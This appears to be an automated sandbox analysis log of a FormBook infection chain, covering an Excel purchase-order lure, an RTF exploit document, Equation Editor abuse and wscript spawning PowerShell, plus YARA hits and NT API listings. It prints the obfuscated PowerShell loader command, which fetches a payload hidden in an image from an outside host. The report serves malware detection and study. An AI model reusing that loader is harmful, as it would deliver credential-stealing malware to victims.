            Source: find.exe, 0000000D.00000002.621202000.0000000002D06000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.00000000030E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.instagram.com/hover_domains
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ziyuan.baidu.com/image.gif
            Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
            Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
            Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
            Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49161 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49163 version: TLS 1.2

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.466471419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.521653656.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.620757047.00000000000F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.620790814.00000000002C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.620825188.0000000000330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.466373539.00000000003A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.469509226.00000000025A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.466471419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000010.00000002.521653656.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.620757047.00000000000F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.620790814.00000000002C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.620825188.0000000000330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.466373539.00000000003A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.469509226.00000000025A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: Process Memory Space: powershell.exe PID: 3148, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 3248, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1288490C.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethesmoothofbutterburnwhichtasteofentirethingstounderrstnadwellthebuttersmoothchocolateburneatwellwith_______sweetandhotburn[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
            Excel sheet contains many unusual embedded objects
            Source: Mac Purchase Order PO102935.xlsOLE: Microsoft Excel 2007+
            Source: 5B430000.0.drOLE: Microsoft Excel 2007+
            Microsoft Office drops suspicious files
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\GmwgTs.urlJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\jiourl.com.urlJump to behavior
            Very long command line found
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 9406
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 9406Jump to behavior
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
            Wscript starts Powershell (via cmd or directly)
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\find.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0042C193 NtClose,11_2_0042C193
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022B07AC NtCreateMutant,LdrInitializeThunk,11_2_022B07AC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022AFAE8 NtQueryInformationProcess,LdrInitializeThunk,11_2_022AFAE8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022AFB68 NtFreeVirtualMemory,LdrInitializeThunk,11_2_022AFB68
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022AF9F0 NtClose,LdrInitializeThunk,11_2_022AF9F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022AFDC0 NtQuerySystemInformation,LdrInitializeThunk,11_2_022AFDC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022B0060 NtQuerySection,11_2_022B0060
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022B0078 NtResumeThread,11_2_022B0078
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022B0048 NtProtectVirtualMemory,11_2_022B0048
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022B00C4 NtCreateFile,11_2_022B00C4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022B010C NtOpenDirectoryObject,11_2_022B010C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022B01D4 NtSetValueKey,11_2_022B01D4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022B0C40 NtGetContextThread,11_2_022B0C40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022B10D0 NtOpenProcessToken,11_2_022B10D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022B1148 NtOpenThread,11_2_022B1148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022AFA20 NtQueryInformationFile,11_2_022AFA20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022AFA50 NtEnumerateValueKey,11_2_022AFA50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022AFAB8 NtQueryValueKey,11_2_022AFAB8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022AFAD0 NtAllocateVirtualMemory,11_2_022AFAD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022AFB50 NtCreateKey,11_2_022AFB50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022AFBB8 NtQueryInformationToken,11_2_022AFBB8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022AFBE8 NtQueryVirtualMemory,11_2_022AFBE8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022AF8CC NtWaitForSingleObject,11_2_022AF8CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022AF938 NtWriteFile,11_2_022AF938
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022B1930 NtSetContextThread,11_2_022B1930
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022AF900 NtReadFile,11_2_022AF900
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022AFE24 NtWriteVirtualMemory,11_2_022AFE24
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022AFEA0 NtReadVirtualMemory,11_2_022AFEA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022AFED0 NtAdjustPrivilegesToken,11_2_022AFED0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022AFF34 NtQueueApcThread,11_2_022AFF34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022AFFB4 NtCreateSection,11_2_022AFFB4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022AFFFC NtCreateProcessEx,11_2_022AFFFC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022AFC30 NtOpenProcess,11_2_022AFC30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022AFC60 NtMapViewOfSection,11_2_022AFC60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022AFC48 NtSetInformationFile,11_2_022AFC48
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022AFC90 NtUnmapViewOfSection,11_2_022AFC90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022AFD5C NtEnumerateKey,11_2_022AFD5C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022AFD8C NtDelayExecution,11_2_022AFD8C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022B1D80 NtSuspendThread,11_2_022B1D80
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00614D5010_2_00614D50
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00614D4010_2_00614D40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041828311_2_00418283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004011E011_2_004011E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040FBB011_2_0040FBB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040FBB311_2_0040FBB3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041646E11_2_0041646E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041647311_2_00416473
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040FDD311_2_0040FDD3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040DE4911_2_0040DE49
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040DE5311_2_0040DE53
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004026E011_2_004026E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0042E74311_2_0042E743
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00402FE011_2_00402FE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022BE2E911_2_022BE2E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022C230511_2_022C2305
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0230A37B11_2_0230A37B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_023663BF11_2_023663BF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022E63DB11_2_022E63DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022BE0C611_2_022BE0C6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0230A63411_2_0230A634
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0236262211_2_02362622
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022C468011_2_022C4680
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022CE6C111_2_022CE6C1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022CC7BC11_2_022CC7BC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0234443E11_2_0234443E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0230654011_2_02306540
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_023405E311_2_023405E3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022DC5F011_2_022DC5F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0236CBA411_2_0236CBA4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_02346BCB11_2_02346BCB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022E286D11_2_022E286D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022CC85C11_2_022CC85C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0230C92011_2_0230C920
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022C29B211_2_022C29B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0236098E11_2_0236098E
